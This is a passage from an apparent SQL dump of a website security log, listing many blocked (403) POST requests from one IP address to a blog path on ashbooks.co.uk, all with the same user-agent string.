FBSMTWB\"}','dwWYnLUGtyeTrxO29i4JMqCH',0,1637216303.0971,405,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','BxvRws5LzUV0DfuHXmZWerkc',0,1637216304.7041,405,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','KmSGLO2bZpBT60eCJlw1nkdV',0,1637216306.3143,437,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','tKNE9ZWVSaQhUTo5iAslCbxk',0,1637216307.6911,379,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','YhbCSGf1X7mP9il2acZdp03s',0,1637216308.9984,394,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Jwu3FG8izmHxdOXK4BrCstYT',0,1637216310.4641,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','q5TJVNYRb3sp8K9ntgLhjF2Q',0,1637216311.7911,382,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Qt8wyZkqEucOpFGriMTdvYf4',0,1637216313.1321,368,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','nIyxBQdswVOa3LqAzMHeFPG1',0,1637216314.7050,1715,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','bTt1ryw60qmsJpLcX7zZNaPD',0,1637216317.4796,455,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Nv0JiYd4pKmyW2gE1CPhe5Gf',0,1637216318.7057,473,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','gkGK5IalmcxToVHewUM6CQzO',0,1637216320.2905,464,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','9tLafw47nHylmvoKceDUG51E',0,1637216321.9750,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mpCNrbTeRjyHDIk45P8YEUG7',0,1637216323.3911,447,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','PWpANC7J8OMVHsQKi4ZBh0Ix',0,1637216324.9713,444,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WFw8Xi0BGmgPlpYvHC5EZft4',0,1637216326.5933,886,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','6YBU9w84GjXbrfOWcL0hkHAv',0,1637216328.5126,462,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','sGbEt7n6ZTulDF2U0agBoVdh',0,1637216329.9177,457,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Uz3jKGh5din9IQJfZyBqY8gR',0,1637216331.7589,461,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','zoKTXMGbsRmJ5uaneOWxdjtf',0,1637216333.4544,444,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','HS924jnwVeOYXMNsKI3rEJAl',0,1637216334.8499,484,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','CuhTXyFdEt9RYBZbjAaxil5K',0,1637216336.4667,429,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','0zTfv8MOG7k6Il1AoK4hFZ3j',0,1637216337.7948,785,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','I7ZwlB92hva4mc1eYyTsCJqp',0,1637216339.6368,461,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','5CtoRTxK0Lu3QzNf97MUODv1',0,1637216341.2808,450,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EMI0znwL4B3kabhm9FDvCTZx',0,1637216342.6395,469,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','NgGEXU9A3VxlwL7npSD6fBRc',0,1637216344.1793,455,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','wi1TEeW5aY2q7f9IDovlu3MS',0,1637216345.5848,447,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','iXhscjCaotA108eyRZNLMPFO',0,1637216346.7105,432,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Cai6ElKO03PG5ReobA4TfuzS',0,1637216348.1044,459,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','FrxLHUMOdVyR2mEYgfoJA37p',0,1637216349.7168,387,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','GPsQMFurw3VkHZmIe4TEpoRA',0,1637216351.1075,367,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','R5ngZEziJMkKLVQljI3DAXsS',0,1637216352.7739,405,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','8ECbcs0xlFWkwP1aRLoX6v93',0,1637216354.3935,618,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','XWP2qDmni3T45hwzEK0Sl8Lu',0,1637216355.9999,691,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','RH1ou8Gh9g0ObI5DapSK3syJ',0,1637216357.6352,407,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','vaVO5nEy9R8NAf1XhImdQs20',0,1637216359.1770,432,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','F6KapTg5Vh3keCdUwS4Q9jmE',0,1637216360.5627,379,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Rv79xAr1WmHKZsSGhMqkdjzw',0,1637216362.0759,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WYlBzvKi8aXZ9VA07wuOjbLd',0,1637216363.7098,438,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','gz1XIjUJNtT0Vmsbu7pdKAWh',0,1637216365.4552,423,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EWwoeck6i5TqlmDpn1BGHONb',0,1637216367.0592,377,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','YRMbJZXdC2p5TEaxmkciUnV0',0,1637216368.2652,411,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','TnJXsvjAcG7mIokYl3EUMKgC',0,1637216369.6370,381,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Jh8N7iG5yXpLq31YBaO6gfEV',0,1637216370.9265,393,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','7a9AY2KRtBvrbJL1UzoyOn4g',0,1637216372.2141,402,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','7q8pDIeQ0w14NOJyUXrKum2t',0,1637216373.3995,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Ny2YugjUXm40dQ7aocGeHbAO',0,1637216374.7002,393,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','85RFZL49zcfCblYXgAEDm6tU',0,1637216376.0965,404,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Oufj8I7Aa6SeqyoQvYtF2WxV',0,1637216377.6385,411,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','tsKZjXncRT7hICDqarQku5E4',0,1637216379.0748,421,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','BjoFWlGHa63KPgC2v74R1YiT',0,1637216380.4323,421,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','brId58MJeCvG7FH03BVlNQOw',0,1637216381.7159,447,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EIdBZl5GMqQ7t3cL6bU4CehS',0,1637216382.9559,422,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ARc94PtXsjbhaQ81roxDKiOB',0,1637216384.5699,392,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mvjh02NTuOedAMqSPgia3VJC',0,1637216386.0326,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','69di7SPtrh2ocs15bwJfOXxz',0,1637216387.7144,412,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','kH6X8oEfuqnYB3Ozl4Zb15aU',0,1637216389.2108,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','2rZBYXu64RAfU7lK1i89HvDj',0,1637216390.8393,994,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','keXA307TaVLB1ftlmPJbwEHn',0,1637216393.1079,412,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Qc8xrYpIRPZsqO2oh1ABwDk6',0,1637216394.7378,383,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','m0QOiWJqxDYodjk3nwagcuph',0,1637216396.0628,432,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','NFtzse7Z2l0aEYvHoqWw5yu3',0,1637216397.2781,430,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Kabe1QFlokOqBHS8DfzLN9jX',0,1637216398.8600,417,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','qIuR9FgJrxkEzw627ZaLnD4W',0,1637216400.5100,395,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','pUGyf5CALsxkg2Xc9Z6DROdz',0,1637216401.7725,372,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','3BEY16ASF7hDGQb0xcCtRsLM',0,1637216403.2316,430,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','SKDpli97sHCMObgGJEerThcV',0,1637216404.4725,422,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','O5Tmd3qw6CxtDpHyUAhN9noa',0,1637216406.0599,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','cb9ULjdxYA4uvMDHtIawzgli',0,1637216407.6585,395,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Q1ySh02keaiUFGHmBAEj7V8L',0,1637216409.2396,416,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','usQModZORK1V0h23IjN8tfqB',0,1637216410.6135,441,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','n2R8AeOYxQkEmuFDJ3dz1I7i',0,1637216412.1157,385,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','zlw1X3EKskqB59yUaHTdhV7Y',0,1637216413.5814,415,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','gS4lmVW29v7pxNTXQouPdh5w',0,1637216414.6510,442,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','I4G8kAxDLjOvB0lMwo6E57hZ',0,1637216416.3345,417,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','tOpdacqJC6uL75s4VUDSrRze',0,1637216417.6334,426,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','KcYp27DuahAdW3z5fZJg0V1L',0,1637216419.2108,404,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','nh7TmW1IB4FcAZ2Pjdvpyq8V',0,1637216420.6217,406,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','0AjEhgKtJHaIPTUo9ZQ7b852',0,1637216422.2706,427,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','OJQvWSPmY0cZAV1d8rjD6L5I',0,1637216423.7521,423,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','I6y7qvROXQMwHlauBz8Ax24g',0,1637216425.4206,422,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','eYsR8Kgo14cZHhAjqNltmiTu',0,1637216427.1181,392,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 